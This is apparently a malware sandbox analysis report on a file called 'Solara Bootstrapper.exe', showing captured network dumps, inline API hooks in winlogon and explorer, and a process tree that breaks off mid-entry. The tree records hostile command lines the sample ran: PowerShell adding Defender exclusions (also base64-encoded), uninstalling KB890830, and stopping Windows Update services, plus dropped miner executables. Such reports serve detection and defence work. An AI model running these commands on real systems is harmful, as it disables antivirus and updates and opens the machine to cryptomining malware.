2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 39 61 37 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 63 66 66 31 63 39 62 32 37 62 31 61 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f Data Ascii: 9a77.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-cff1c9b27b1a.css" /><link data-color-theme="dark_colorblind" crossorigin="ano
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 6d 65 72 2d 34 34 33 30 64 33 63 32 63 31 35 30 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 6c 6f 62 61 6c 2d 31 64 33 34 34 30 65 39 34 36 64 64 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 Data Ascii: mer-4430d3c2c150.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1d3440e946dd.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubasse
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 66 66 37 31 30 34 35 63 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 2d 39 64 61 36 35 32 66 35 38 34 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 Data Ascii: ff71045cf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script><script crossorigin="a
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 36 64 61 34 62 33 66 61 33 34 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f Data Ascii: les_github_relative-time-element_dist_index_js-f6da4b3fa34c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 65 6c 65 6d 65 6e 74 73 2d 66 39 39 31 63 66 61 62 35 31 30 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 62 35 33 36 32 64 33 64 34 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 Data Ascii: elements-f991cfab5105.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-3b5362d3d402.js"></script><script crossorigin="anonymous" defer="defer" type="app
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 65 33 31 38 30 66 65 33 62 63 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 Data Ascii: defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 66 62 34 33 38 31 36 61 62 38 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 Data Ascii: script" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-fb43816ab83c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
2025-01-07 15:09:11 UTC	1370	IN	Data Raw: 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 4a 47 4d 6a 59 36 4d 54 4d 34 4e 7a 55 36 4d 30 45 31 4d 7a 4e 45 52 54 6f 7a 51 6b 4a 44 4e 7a 52 45 4f 6a 59 33 4e 30 51 30 4d 7a 6b 30 49 69 77 69 64 6d 6c 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 59 34 4d 54 63 77 4d 44 59 35 4f 54 6b 78 4e 44 59 32 4e 7a 63 78 4e 44 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 35 6b 5a 58 49 69 Data Ascii: 3" data-turbo-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjJGMjY6MTM4NzU6M0E1MzNERTozQkJDNzREOjY3N0Q0Mzk0IiwidmlzaXRvcl9pZCI6IjY4MTcwMDY5OTkxNDY2NzcxNDEiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIi

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, explorer.exe
NtDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
ZwDeviceIoControlFile	INLINE	winlogon.exe, explorer.exe
NtEnumerateKey	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQuerySystemInformation	INLINE	winlogon.exe, explorer.exe
NtResumeThread	INLINE	winlogon.exe, explorer.exe
RtlGetNativeSystemInformation	INLINE	winlogon.exe, explorer.exe
NtQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFileEx	INLINE	winlogon.exe, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, explorer.exe

Processes

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	10:09:03
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\Solara Bootstrapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Solara Bootstrapper.exe"
Imagebase:	0x400000
File size:	10'967'040 bytes
MD5 hash:	00A1864355A5EA47902E5757C0D87FD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:09:04
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:09:04
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:09:04
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\kx new.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\kx new.exe"
Imagebase:	0x400000
File size:	10'948'608 bytes
MD5 hash:	D9D13FA25E880665FB471A4BE57C494C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:09:04
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
Imagebase:	0x890000
File size:	13'312 bytes
MD5 hash:	6557BD5240397F026E675AFB78544A26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 33%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:09:04
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:09:05
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Imagebase:	0x100000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:09:05
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:09:06
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\Kawpow new.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Imagebase:	0x7ff6cdc40000
File size:	5'471'744 bytes
MD5 hash:	FB6A3B436E9F9402937D95F755B62F91
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:09:07
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:09:07
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:09:07
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\xmr new.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\xmr new.exe"
Imagebase:	0x7ff7b6150000
File size:	5'471'744 bytes
MD5 hash:	7D6398EBFB82A24748617189BF4AD691
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:09:08
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7412, Parent PID: 7404

General

Target ID:	14
Start time:	10:09:08
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:09:08
Start date:	07/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7ccdf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff704ea0000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff7ccdf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:09:16
Start date:	07/01/2025
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff67c8f0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
